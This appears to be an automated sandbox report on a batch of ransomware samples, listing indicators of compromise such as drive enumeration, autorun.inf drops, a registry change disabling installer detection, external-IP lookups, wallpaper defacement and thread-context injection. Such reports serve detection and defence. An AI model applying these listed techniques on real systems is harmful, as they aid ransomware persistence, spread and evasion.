File opened for modification	\??\c:\users\admin\videos\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\admin\pictures\camera roll\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-2437139445-1151884604-3026847218-1000\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	\??\c:\users\admin\3d objects\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\admin\links\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\admin\music\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	\??\c:\users\admin\favorites\links\desktop.ini	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

defense_evasion persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\K:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\Q:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\O:	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
File opened (read-only)	\??\P:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File opened (read-only)	\??\Z:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\Q:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\V:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\D:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\L:	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
File opened (read-only)	\??\M:	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
File opened (read-only)	\??\K:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\L:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\I:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\J:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\O:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\S:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\U:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\W:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\O:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File opened (read-only)	\??\Q:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File opened (read-only)	\??\Z:	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
File opened (read-only)	\??\E:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\Y:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\N:	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
File opened (read-only)	\??\T:	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
File opened (read-only)	\??\H:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File opened (read-only)	\??\B:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\H:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\J:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File opened (read-only)	\??\A:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\T:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File opened (read-only)	\??\Z:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File opened (read-only)	\??\B:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\I:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\O:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\X:	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
File opened (read-only)	\??\K:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File opened (read-only)	\??\S:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File opened (read-only)	\??\T:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\L:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\N:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\S:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\Z:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\J:	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
File opened (read-only)	\??\R:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File opened (read-only)	\??\W:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File opened (read-only)	\??\D:	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
File opened (read-only)	\??\P:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\V:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\A:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\B:	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
File opened (read-only)	\??\X:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\I:	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
File opened (read-only)	\??\F:	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
File opened (read-only)	\??\X:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\T:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\H:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\M:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\R:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\Y:	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
File opened (read-only)	\??\R:	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened (read-only)	\??\V:	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
File opened (read-only)	\??\A:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File opened (read-only)	\??\Y:	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe

Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 3 IoCs

Possible Turn off User Account Control's privilege elevation for standard users.

Executable Installer File Permissions Weakness

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0"	ajhqekm.exe

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
124	www.whatismyip.ca
67	www.showmyipaddress.com
73	api.2ip.ua
95	api.2ip.ua
97	api.2ip.ua
100	whatismyip.everdot.org
104	api.2ip.ua
114	www.whatismyip.ca
120	whatismyip.everdot.org
70	api.2ip.ua
74	whatismyipaddress.com
86	whatismyip.everdot.org
345	api.2ip.ua

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0008000000023bd5-111.dat	autoit_exe

Drops autorun.inf file 1 TTPs 10 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	F:\AUTORUN.INF	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File opened for modification	\??\f:\AUTORUN.INF	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	C:\autorun.inf	ajhqekm.exe
File created	C:\autorun.inf	ajhqekm.exe
File opened for modification	C:\autorun.inf	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	F:\autorun.inf	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\AUTORUN.INF	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File opened for modification	\??\c:\AUTORUN.INF	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
File opened for modification	F:\autorun.inf	ajhqekm.exe
File created	F:\autorun.inf	ajhqekm.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe	lurwhzlcveb.exe
File created	C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe	ajhqekm.exe
File created	C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe	ajhqekm.exe
File opened for modification	C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe	ajhqekm.exe
File opened for modification	C:\Windows\SysWOW64\njuqrkzslgwouicdyyjf.exe	ajhqekm.exe
File opened for modification	C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\SysWOW64\zryqncncriuikukh.exe	ajhqekm.exe
File created	C:\Windows\SysWOW64\zryqncncriuikukh.exe	ajhqekm.exe
File opened for modification	C:\Windows\SysWOW64\pjsmlcpgxqeuykcbus.exe	ajhqekm.exe
File created	C:\Windows\SysWOW64\njuqrkzslgwouicdyyjf.exe	ajhqekm.exe
File created	C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe	ajhqekm.exe
File created	C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\SysWOW64\njuqrkzslgwouicdyyjf.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\SysWOW64\zryqncncriuikukh.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe	lurwhzlcveb.exe
File created	C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe	ajhqekm.exe
File created	C:\Windows\System32\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\SysWOW64\HelpMe.exe	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File opened for modification	C:\Windows\SysWOW64\hleirspqrussgcenqyrvosbc.abe	ajhqekm.exe
File created	C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe	lurwhzlcveb.exe
File created	C:\Windows\SysWOW64\zryqncncriuikukh.exe	lurwhzlcveb.exe
File created	C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe	ajhqekm.exe
File opened for modification	C:\Windows\SysWOW64\pjsmlcpgxqeuykcbus.exe	ajhqekm.exe
File opened for modification	C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe	ajhqekm.exe
File opened for modification	C:\Windows\SysWOW64\qfjysemykyhsrylftmqfjysemykyhsrylft.qfj	ajhqekm.exe
File created	C:\Windows\SysWOW64\HelpMe.exe	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File created	C:\Windows\System32\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File created	C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe	ajhqekm.exe
File opened for modification	C:\Windows\SysWOW64\njuqrkzslgwouicdyyjf.exe	ajhqekm.exe
File created	C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe	ajhqekm.exe
File created	C:\Windows\SysWOW64\zryqncncriuikukh.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe	lurwhzlcveb.exe
File created	C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe	ajhqekm.exe
File created	C:\Windows\SysWOW64\njuqrkzslgwouicdyyjf.exe	ajhqekm.exe
File opened for modification	C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe	ajhqekm.exe
File created	C:\Windows\SysWOW64\notepad.exe.exe	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
File created	C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\SysWOW64\pjsmlcpgxqeuykcbus.exe	lurwhzlcveb.exe
File created	C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe	lurwhzlcveb.exe
File created	C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe	ajhqekm.exe
File opened for modification	C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe	ajhqekm.exe
File opened for modification	C:\Windows\SysWOW64\zryqncncriuikukh.exe	lurwhzlcveb.exe
File created	C:\Windows\SysWOW64\pjsmlcpgxqeuykcbus.exe	lurwhzlcveb.exe
File created	C:\Windows\SysWOW64\zryqncncriuikukh.exe	ajhqekm.exe
File created	C:\Windows\SysWOW64\hleirspqrussgcenqyrvosbc.abe	ajhqekm.exe
File opened for modification	C:\Windows\SysWOW64\pjsmlcpgxqeuykcbus.exe	lurwhzlcveb.exe
File created	C:\Windows\SysWOW64\pjsmlcpgxqeuykcbus.exe	ajhqekm.exe
File created	C:\Windows\System32\Info.hta	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Windows\SysWOW64\njuqrkzslgwouicdyyjf.exe	lurwhzlcveb.exe
File created	C:\Windows\SysWOW64\njuqrkzslgwouicdyyjf.exe	lurwhzlcveb.exe
File created	C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe	ajhqekm.exe
File opened for modification	C:\Windows\SysWOW64\zryqncncriuikukh.exe	ajhqekm.exe
File created	C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe	ajhqekm.exe
File created	C:\Windows\SysWOW64\qfjysemykyhsrylftmqfjysemykyhsrylft.qfj	ajhqekm.exe
File created	C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe	ajhqekm.exe
File created	C:\Windows\SysWOW64\pjsmlcpgxqeuykcbus.exe	ajhqekm.exe
File opened for modification	C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe	lurwhzlcveb.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smm8s760zic0.bmp"	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dau8.bmp"	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe

Suspicious use of SetThreadContext 21 IoCs

description	pid	Process	procid_target
PID 5072 set thread context of 3404	5072	HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe	128
PID 1652 set thread context of 5804	1652	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe	240
PID 4324 set thread context of 5264	4324	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe	251
PID 2004 set thread context of 9960	2004	Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe	254
PID 2004 set thread context of 9960	2004	Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe	254
PID 3172 set thread context of 10220	3172	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe	257
PID 1776 set thread context of 7296	1776	tpvpyme.exe	275
PID 1776 set thread context of 6568	1776	tpvpyme.exe	277
PID 1776 set thread context of 11220	1776	tpvpyme.exe	280
PID 1396 set thread context of 9200	1396	Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe	301
PID 2304 set thread context of 6036	2304	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe	330
PID 4928 set thread context of 8824	4928	HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe	363
PID 4928 set thread context of 8824	4928	HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe	363
PID 3692 set thread context of 5868	3692	Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe	461
